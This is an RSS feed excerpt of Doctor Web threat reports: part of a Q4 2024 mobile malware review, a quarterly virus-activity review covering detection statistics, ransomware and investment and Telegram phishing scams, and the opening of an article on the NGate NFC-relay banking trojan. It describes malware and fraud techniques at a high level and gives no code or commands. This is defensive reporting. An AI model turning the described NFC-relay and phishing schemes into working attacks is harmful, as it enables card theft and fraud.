  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Examples of new Android.FakeApp.1669 trojan modifications. The “WordCount” app was disguised as a text tool, and the “Split it: Checks and Tips” app was supposed to help café- and restaurant-goers pay their bills and calculate tips.&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Several new members of the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; adware trojan family were among the threats detected on Google Play. They conceal their presence on infected devices.&lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/11_Android.HiddenAds.4013_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/11_Android.HiddenAds.4013_q4_2024.1.png" alt="Android.HiddenAds"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;This “Cool Fix Photo Enhancer” photo-editing software was hiding the Android.HiddenAds.4013 ad-displaying trojan&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Moreover, trojans protected with a sophisticated software packer were also discovered: &lt;a href="https://vms.drweb.com/search/?q=Android.Packed&amp;lng=en"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57156&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.Packed&amp;lng=en"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57157&lt;/b&gt;, and &lt;a href="https://vms.drweb.com/search/?q=Android.Packed&amp;lng=en"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57159&lt;/b&gt;, for example.&lt;/p&gt;
  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/12_Android.Packed.57156_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/12_Android.Packed.57156_q4_2024.1.png" alt="Android.Packed"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/13_Android.Packed.57159_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/13_Android.Packed.57159_q4_2024.1.png" alt="Android.Packed"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;The “Lie Detector Fun Prank” and “Speaker Dust and Water Cleaner” programs are trojans protected with a software packer&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Our specialists also detected &lt;a href="https://vms.drweb.com/search/?q=Android.Subscription&amp;lng=en"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.22&lt;/b&gt;, malware designed to subscribe users to paid services.&lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/14_Android.Subscription.22_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/14_Android.Subscription.22_q4_2024.1.png" alt="Android.Subscription"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Instead of editing photos, the “InstaPhoto Editor” program subscribed users to a paid service &lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;At the same time, cybercriminals again distributed trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.Joker&amp;lng=en"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; family, which also subscribed victims to paid services.&lt;/p&gt;

  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/15_Android.Joker.2281_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/15_Android.Joker.2281_q4_2024.1.png" alt="Android.Joker"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/16_Android.Joker_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/16_Android.Joker_q4_2024.1.png" alt="Android.Joker"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;The SMS messenger “Smart Messages” and the third-party keyboard “Cool Keyboard” tried to covertly subscribe victims to a paid service&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;To protect your Android device from malware and unwanted programs, we recommend installing Dr.Web anti-virus products for Android.&lt;/p&gt;
  &lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q4%202024%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;

&lt;/section&gt;



</description></item><item><guid>https://news.drweb.com/show/?i=14959&amp;lng=en</guid><title>Doctor Web’s Q4 2024 virus activity review</title><link>https://news.drweb.com/show/?i=14959&amp;lng=en&amp;c=9</link><pubDate>Thu, 26 Dec 2024 04:00:00 GMT</pubDate><description>


&lt;p&gt;&lt;b&gt;December 26, 2024&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
  &lt;p&gt;&lt;newslead&gt;According to the statistics collected by the Dr.Web anti-virus, the total number of threats detected in the fourth quarter of 2024 decreased by 1.53%, compared to the third quarter. At the same time, the number of unique threats increased by 94.43%. Among the most commonly detected threats were adware programs and adware trojans, malicious scripts, and trojans that are distributed with other malware and used to make the main payload difficult to detect. The majority of detections in email traffic were due to malicious scripts, adware trojans, and cryptocurrency-mining trojans. Increased activity on the part of spyware malicious apps was also noted.&lt;/newslead&gt;&lt;/p&gt;
  &lt;p&gt;Users whose files were affected by encoder trojans most commonly encountered &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;b&gt;Trojan.Encoder.35067&lt;/b&gt;, and &lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.26996&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.26996&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;
  &lt;p&gt;Once again, the most widespread threats observed on Android devices were &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; ad-displaying trojans. At the same time, our malware analysts discovered many new threats.&lt;/p&gt;

  &lt;div class="paddXM paddYM bg_ocean_1 white custom-color-link"&gt;
    &lt;h4 class="white alignCenter"&gt;Principal trends in Q4 2024&lt;/h4&gt;
    &lt;ul&gt;
      &lt;li&gt;Adware software and adware trojans were once again the most commonly detected threats.&lt;/li&gt;
      &lt;li&gt;The number of unique threats increased, compared to the previous quarter.&lt;/li&gt;
      &lt;li&gt;Increased activity on the part of spyware trojans in email traffic.&lt;/li&gt;
      &lt;li&gt;The distribution of many trojan apps through Google Play.&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/div&gt;
&lt;/section&gt;


&lt;section class="margTM margBM" id="stat"&gt;
  &lt;h2 class="alignCenter"&gt;According to Doctor Web’s statistics service&lt;/h2&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/01_stat_q4_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/01_stat_q4_2024_en.1.png" alt="According to Doctor Web’s statistics service"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;p&gt;The most common threats in Q4 2024:&lt;/p&gt;
  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Downware.20091&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Adware that often serves as an intermediary installer of pirated software.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.6&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A malicious script that, in an infinite loop, searches for windows containing the text &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt;, and &lt;span class="string"&gt;розробника&lt;/span&gt; and sends them an Escape key press event, forcibly closing them.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=JS.Siggen5.44590&amp;lng=en"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
      &lt;dd&gt;Malicious code added to the es5-ext-main public JavaScript library. It shows a specific message if the package is installed on a server with the time zone of a Russian city.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.4210&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for malicious components of the WinSafe browser extension. These components are JavaScript files that display intrusive ads in browsers.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8242&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A malicious program that launches a mining trojan.&lt;/dd&gt;
  &lt;/dl&gt;

  &lt;h2 class="alignCenter"&gt;Statistics for malware discovered in email traffic&lt;/h2&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/02_mail_traffic_q4_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/02_mail_traffic_q4_2024_en.1.png" alt="Statistics for malware discovered in email traffic"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=JS.Siggen5.44590&amp;lng=en"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
      &lt;dd&gt;Malicious code added to the es5-ext-main public JavaScript library. It shows a specific message if the package is installed on a server with the time zone of a Russian city.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.Inject&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A family of malicious JavaScripts that inject a malicious script into the HTML code of webpages.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;LNK.Starter.56&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for a shortcut that is crafted in a specific way. This shortcut is distributed through removable media, like USB flash drives. To mislead users and conceal its activities, it has a default icon of a disk. When launched, it executes malicious VBS scripts from a hidden directory located on the same drive as the shortcut itself.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Win32.HLLW.Rendoc.3&amp;lng=en"&gt;&lt;b&gt;Win32.HLLW.Rendoc.3&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
      &lt;dd&gt;A network worm that spreads via removable storage media and other channels.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Fbng.123&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A spyware trojan also known as Formbook. Designed to steal various data from infected devices, it hijacks passwords saved in web browsers, email clients, online messengers, and other software; intercepts input data in web forms; monitors keystrokes (keylogger functionality); and takes screenshots. In addition, it can download and run other programs and execute various commands, operating as a backdoor.&lt;/dd&gt;
  &lt;/dl&gt;

&lt;/section&gt;


&lt;section class="margTM margBM" id="encryptor"&gt;
  &lt;h2 class="alignCenter"&gt;Encryption ransomware&lt;/h2&gt;
  &lt;p&gt;In Q4 2024, the number of requests made to decrypt files affected by encoder trojans decreased by 18.96%, compared to Q3 2024.&lt;/p&gt;
  &lt;p&gt;The dynamics of the decryption requests received by Doctor Web’s technical service:&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/03_encoder_requests_q4_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/03_encoder_requests_q4_2024_en.1.png" alt="Encryption ransomware"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;p&gt;The most common encoders of Q4 2024:&lt;/p&gt;
  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 22.63% of user requests&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35067&lt;/b&gt; — 3.91% of user requests&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.26996&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.26996&lt;/b&gt;&lt;/a&gt; — 3.35% of user requests&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.35209&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt; — 3.07% of user requests&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.38200&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.38200&lt;/b&gt;&lt;/a&gt; — 3.07% of user requests&lt;/dt&gt;
  &lt;/dl&gt;
&lt;/section&gt;


&lt;section class="margTM margBM" id="dangerous"&gt;
  &lt;h2 class="alignCenter"&gt;Network fraud&lt;/h2&gt;
  &lt;p&gt;In Q4 2024, threat actors continued exploiting a popular fraudulent scheme in which they used specially crafted websites to offer potential victims opportunities to make money through different investments. To “access” the investing service, users are asked to register an account by providing personal data that subsequently ends up in the fraudsters’ hands. Residents of various countries have encountered such websites.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/04_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/04_fraud_q4_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;On this fraudulent site, supposedly affiliated with the World Bank, European users are assured that they will get dividends for investing in promising economic sectors&lt;/em&gt;&lt;/p&gt;


  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/05_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/05_fraud_q4_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A fraudulent website offers Slovak users the chance to “earn more than $192,460 per month” with the help of some investing service&lt;/em&gt;&lt;/p&gt;

  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/06_fraud_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/06_fraud_q4_2024.1.png" alt="Network fraud"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/07_fraud_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/07_fraud_q4_2024.1.png" alt="Network fraud"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Fraudsters pose as large banks and oil and gas companies and offer users from Armenia and Moldova opportunities to “make money on stocks”&lt;/em&gt;&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/08_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/08_fraud_q4_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;The fake website of an Azerbaijani oil and gas company on which visitors are promised income starting from 1,000 manat per month&lt;/em&gt;&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/09_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/09_fraud_q4_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;The website of a “new Google investing platform” offers the opportunity to take a survey and get access to a service that will supposedly allow users to make at least €1,000&lt;/em&gt;&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/10_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/10_fraud_q4_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;One of the fraudulent sites promises Russian users “a safe passive income”, starting from 150,000 rubles per month&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Doctor Web’s experts noted a seasonal change in the contents of such sites. Ahead of the New Year holidays, scammers began exploiting the gifts theme, allegedly acting on behalf of banks, oil and gas companies, crypto exchanges, and other organizations. On one such fake site, Russian users supposedly could receive payments from a crypto exchange in accordance with some “lists”. And to check whether such payments are available to them, potential victims were asked to take a survey and provide personal data.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/11_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/11_fraud_q4_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;A fake crypto exchange website offers Russian users the chance to get “New Year payments”&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Another fake site informed visitors about some “New Year’s offer” from an oil and gas company, whereby many Kazakhstani users could allegedly start receiving from 200,000 to 1,000,000 tenge per month in honor of the country’s Independence Day. To “receive” payments, potential victims had to submit an “application” by providing their personal information on this website.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/12_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/12_fraud_q4_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;This fraudulent site promised Kazakhstani users large payments in honor of Independence Day as part of a “New Year’s offer”&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;At the same time, our Internet analysts detected the emergence of new fake websites of Russian banks. On these, potential victims are asked to take part in a service-quality survey and then allegedly receive a money reward for doing so. Users are asked to provide personal data, including their full names, the mobile phone number linked to their bank account, as well as their bank card number.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/13_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/13_fraud_q4_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;An example of a bogus site that mimics the appearance of a genuine bank website and offers potential victims the opportunity to participate in the survey for a reward&lt;/em&gt;&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/14_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/14_fraud_q4_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;To “participate” in the survey, the user has to fill out the form by providing their personal information &lt;/em&gt;&lt;/p&gt;


  &lt;p&gt;Moreover, fraudulent sites offering online training, such as programming, were identified. Interested visitors were asked to leave their contact information to “receive a consultation”.&lt;/p&gt;


  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/15_fraud_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/15_fraud_q4_2024.1.png" alt="Network fraud"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/16_fraud_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/16_fraud_q4_2024.1.png" alt="Network fraud"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;A website that offers programming courses online. To “receive a consultation”, users have to provide their personal information.&lt;/em&gt;&lt;/p&gt;


  &lt;p&gt;Online scammers keep trying to steal Telegram accounts. In Q4 2024, more phishing sites disguised as various online voting platforms were discovered, for example, for “children’s drawing competitions”. To “confirm” their vote, users are asked to provide their mobile phone number to which a verification code will be sent. However, by typing this code on the bogus website, they are granting fraudsters access to their accounts.&lt;/p&gt;


  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/17_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/17_fraud_q4_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A scammer website on which visitors are asked to vote in the children’s drawing competition&lt;/em&gt;&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/18_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/18_fraud_q4_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A “vote counting system” demands a mobile phone number for “confirming the vote” and sending a one-time code&lt;/em&gt;&lt;/p&gt;


  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/19_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/19_fraud_q4_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;When victims enter the received code, they grant the fraudsters access to their Telegram accounts &lt;/em&gt;&lt;/p&gt;

  &lt;div class="CellBlock dangerous_urls_new alignCenter"&gt;
    &lt;a href="https://antifraud.drweb.com/dangerous_urls/?lng=en" target="_blank" rel="noopener noreferrer" class="fontM font2X white textShadow"&gt;Find out more about Dr.Web non-recommended sites&lt;/a&gt;
  &lt;/div&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="formobile"&gt;
  &lt;h2 class="alignCenter"&gt;Malicious and unwanted programs for mobile devices&lt;/h2&gt;
  &lt;p&gt;According to detection statistics collected by Dr.Web Security Space for mobile devices, in Q4 2024, users most often encountered &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; ad-displaying trojans and the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; and &lt;b&gt;Android.Siggen&lt;/b&gt; malicious apps. At the same time, over the past quarter, Doctor Web’s experts discovered many new threats on Google Play.&lt;/p&gt;
  &lt;p&gt;The following Q4 2024 events involving mobile malware are the most noteworthy:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;High activity on the part of &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; ad-displaying trojans and &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; fraudulent malware,&lt;/li&gt;
    &lt;li&gt;The emergence of new malicious apps on Google Play.&lt;/li&gt;
  &lt;/ul&gt;

  &lt;p&gt;To find out more about the security-threat landscape for mobile devices in Q4 2024, read our &lt;a href="https://news.drweb.com/show/review/?i=14950&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;special overview&lt;/a&gt;.&lt;/p&gt;

&lt;/section&gt;



</description></item><item><guid>https://news.drweb.com/show/?i=14969&amp;lng=en</guid><title>Contactless banking for thee (and for thief): NFC money theft scheme reaches Russian users</title><link>https://news.drweb.com/show/?i=14969&amp;lng=en&amp;c=9</link><pubDate>Thu, 26 Dec 2024 02:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;December 26, 2024&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Malware analysts at “Doctor Web” warn about the emergence of new versions of the NGate banking trojan, targeting users in Russia. This trojan relays data from the NFC chip of the compromised device, allowing the attacker to withdraw money from the victim's accounts at ATMs without any involvement on the victim’s part.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The NGate banker first appeared on the radar of antivirus vendors in the autumn of 2023, when reports of attacks on customers of major Czech banks began to appear in specialized media. The attackers' strategy involved a combination of social engineering, phishing and the use of malware. When used together, these standard tactics created a rather innovative scenario: after interacting with the victim, the hackers gained remote access to the NFC capabilities of the victim's payment method. Law enforcement in the Czech Republic was able to stop this campaign, but its concept was adapted to the Russian context and used there for illegal enrichment.&lt;/p&gt;

&lt;p&gt;The event that initiates the attack chain is likely to be a phone call from fraudsters claiming that the victim is eligible for a social benefit or other financial gain. To receive it, the victim must tap on a link that leads to a fraudulent website hosting a malicious APK containing the NGate trojan. The APK is disguised as an application for the Gosuslugi (government services) portal, the Bank of Russia or one of the other popular banks.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/vir-news/0.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/vir-news/0.png" alt="danger_apps_icons"&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Icons of fake applications, made to look like their official counterparts&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The NGate banking trojan is a malicious modification of the open source NFCGate application, which was developed to debug NFC data transfer protocols. NFCGate supports a number of functions, but of most interest to attackers is the ability to capture NFC traffic and send it to a remote device, which could be either an intermediary server or the attacker's own smartphone. The criminals have modified the source code by adding user interfaces similar to the official applications and enabling the NFC data relay mode. In addition, the application includes the &lt;span class="string"&gt;nfc-card-reader&lt;/span&gt; library, which allows the hackers to remotely obtain the card number and its expiry date.&lt;/p&gt;

&lt;p&gt;After launching the application, the victim is prompted to place their payment card on the back of the smartphone, enter the PIN and wait for the fake application to verify the card. At this point, all the data on the card is read and transferred to the criminals. Note that the compromised smartphone does not need to be rooted to expose its NFC data.&lt;/p&gt;

&lt;div class="margTM margBM flex center"&gt;
  &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/vir-news/5.png" class="preview"&gt;
         &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/vir-news/5.png" alt="fake_app_screen"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/vir-news/1.png" class="preview"&gt;
         &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/vir-news/1.png" alt="fake_app_screen"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/vir-news/2.png" class="preview"&gt;
         &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/vir-news/2.png" alt="fake_app_screen"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/vir-news/3.png" class="preview"&gt;
         &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/vir-news/3.png" alt="fake_app_screen"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Screens that ask the victim to place their bank card on the back of their smartphone.&lt;/em&gt;&lt;/p&gt;

